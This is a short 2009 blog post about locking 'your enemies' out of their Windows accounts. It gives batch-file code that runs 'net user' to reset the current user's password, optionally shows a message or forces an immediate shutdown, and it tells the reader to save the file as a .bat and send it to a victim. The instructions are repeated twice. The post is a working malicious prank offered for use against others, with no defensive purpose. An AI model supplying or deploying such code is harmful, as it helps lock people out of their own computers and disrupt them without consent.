How to change passowrd of a user account on your enemies Computer
Monday, May 25, 2009
This Trick Is On Sending Your Victim A Batch File And It Will Change There Windows Password!
Ok 1st.. Open Notepad Type One Of The Following..
(Choices On What Will Happen To The Victim's Computer)
.................................................................................................
Choices :
.................................................................................................
Code with personal message:
@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL
.................................................................................................
Code without personal message:
@net user %USERNAME% (The new password) > NUL
.................................................................................................
Code with shutdown command (Shutdown's victims PC after execute):
@net user %USERNAME% (The new password) > NUL
@shutdown -s -t 0
.................................................................................................
[The Dots Are To Seperate The Methods!]
Ok Now Go To File , Save As , Anything.bat And Then Send It To Your Victim And There Password Will Change To Whatever You Like!
Example : @net user Bobby "Password123" > NUL
@shutdown -s -t 0
Ok 1st.. Open Notepad Type One Of The Following..
(Choices On What Will Happen To The Victim's Computer)
........................................
Choices :
........................................
Code with personal message:
@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL
........................................
Code without personal message:
@net user %USERNAME% (The new password) > NUL
........................................
Code with shutdown command (Shutdown's victims PC after execute):
@net user %USERNAME% (The new password) > NUL
@shutdown -s -t 0
........................................
[The Dots Are To Seperate The Methods!]
Ok Now Go To File , Save As , Anything.bat And Then Send It To Your Victim And There Password Will Change To Whatever You Like!
Example : @net user Bobby "Password123" > NUL
@shutdown -s -t 0
Post a Comment